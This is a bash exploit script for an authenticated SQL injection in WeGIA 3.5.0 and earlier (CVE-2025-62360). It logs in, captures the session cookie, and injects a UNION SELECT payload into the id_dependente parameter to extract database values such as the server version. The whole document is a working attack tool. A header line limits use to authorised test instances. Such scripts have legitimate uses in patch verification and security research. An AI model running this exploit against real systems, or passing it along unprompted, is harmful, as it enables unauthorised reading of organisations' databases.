# Exploit Title: WeGIA 3.5.0 - SQL Injection
# Date: 2025-10-14
# Exploit Author: Onur Demir (OnurDemir-Dev)
# Vendor Homepage: https://www.wegia.org
# Software Link: https://github.com/LabRedesCefetRJ/WeGIA/
# Version: <=3.5.0
# Tested on: Local Linux (localhost/127.0.0.1)
# CVE : CVE-2025-62360
# Advisory / Reference: https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mwvv-q9gh-gwxm
# Notes: Run this script ONLY on a local/test instance you own or are authorized to test.
# ============================================================
if [ -z "$4" ]; then
# Usage prompt if required arguments are missing
echo "Usage: $0 <target-url> <user> <password> <payload>"
echo "Example: $0 http://127.0.0.1/WeGIA/ \"admin\" \"wegia\" \"version()\""
exit 1
fi
url="$1"
user="$2"
pass="$3"
payload="$4"
# Check if URL format is valid (basic regex)
# This is a basic sanity check for the URL string format.
if ! [[ "$url" =~ ^http?://[a-zA-Z0-9._-]+ ]]; then
echo "⚠️ Invalid URL format: $url"
exit 1
fi
# Perform login request (multipart/form)
# -s silent, -w "%{http_code}" will append HTTP code to response
# -D - prints response headers to stdout, combined with body in login_response
login_response=$(curl -s -w "%{http_code}" "$url/html/login.php" \
-D - \
-X POST \
-F "cpf=${user}"\
-F "pwd=${pass}")
# Extract last 3 chars as HTTP status code from the combined response
login_status_code="${login_response: -3}"
# If login did not return a 302 redirect, handle error cases
if [ "$login_status_code" -ne 302 ]; then
# If curl couldn't connect, curl may return 0 or empty status code
if [ "$login_status_code" -eq 0 ] || [ -z "$login_status_code" ]; then
echo "❌ Unable to reach URL: $url"
exit 1
fi
# Otherwise report unexpected login status
echo "Error: Received HTTP status code from login: $login_status_code"
exit 1
fi
# Extract the Location header from the login response headers
# Using awk to find the first Location header (case-insensitive)
login_location=$(echo "$login_response" | awk -F': ' 'BEGIN{IGNORECASE=1} /^Location:/{print substr($0, index($0,$2)); exit}' | tr -d '\r')
# Check username and password correctness using Location header content
# If the Location does not include home.php, consider login failed.
if [[ "$login_location" != *"home.php"* ]]; then
# If Location contains "erro" assume wrong credentials; otherwise unknown error
if [[ "$login_location" == *"erro"* ]]; then
echo "Error: Wrong username or password!"
else
echo "Error: Unknown Error!"
fi
exit 1
fi
# Extract Set-Cookie header (first cookie) and keep only "name=value"
# tr -d '\r' removes possible CR characters
set_cookie=$(echo "$login_response" | awk -F': ' 'BEGIN{IGNORECASE=1} /^Set-Cookie:/{print substr($0, index($0,$2)); exit}' | tr -d '\r')
set_cookie=$(echo "$set_cookie" | cut -d';' -f1)
#Exploit Vulnarbility
# (The following performs the SQL injection request using the cookie obtained above)
# The payload variable is used verbatim in the id_dependente parameter.
# Ensure payload is provided safely in the script invocation and that you are authorized to test.
# Execute the curl command and capture the output and status code
response=$(curl -s -w "%{http_code}" "$url/html/funcionario/dependente_documento.php" -d "id_dependente=1 UNION+SELECT 'a','b',$payload;#" -b "$set_cookie;" -H "Content-Type: application/x-www-form-urlencoded")
# Extract the HTTP status code (last 3 characters)
status_code="${response: -3}"
# Extract the body (everything except the last 3 characters)
body="${response:0:-3}"
# If the exploit request returned HTTP 200, try to extract id_doc
if [ "$status_code" -eq 200 ]; then
# Prefer a robust JSON extractor if available; this line uses grep -Po to capture the id_doc value including quotes.
# Note: This grep returns the quoted string (e.g. "11.8.3-MariaDB-1+b1 from Debian").
clear_response=$(echo "$body" | grep -Po '"id_doc": *\K"[^"]*"')
# Print the extracted value (or empty if not found)
echo "$clear_response"
else
# Non-200 status handling
echo "Error: Received HTTP status code $status_code"
fi
